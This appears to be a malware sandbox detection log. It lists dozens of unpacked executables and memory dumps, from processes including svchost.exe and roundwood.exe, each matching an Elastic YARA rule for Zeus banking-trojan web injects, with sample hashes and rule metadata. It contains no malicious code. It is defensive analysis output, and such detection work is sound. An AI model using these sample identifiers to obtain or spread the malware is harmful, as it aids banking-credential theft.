Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.roundwood.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.roundwood.exe.6bf318.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.33.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c20000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.roundwood.exe.406400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.34.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88e000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.30.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2471833561.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
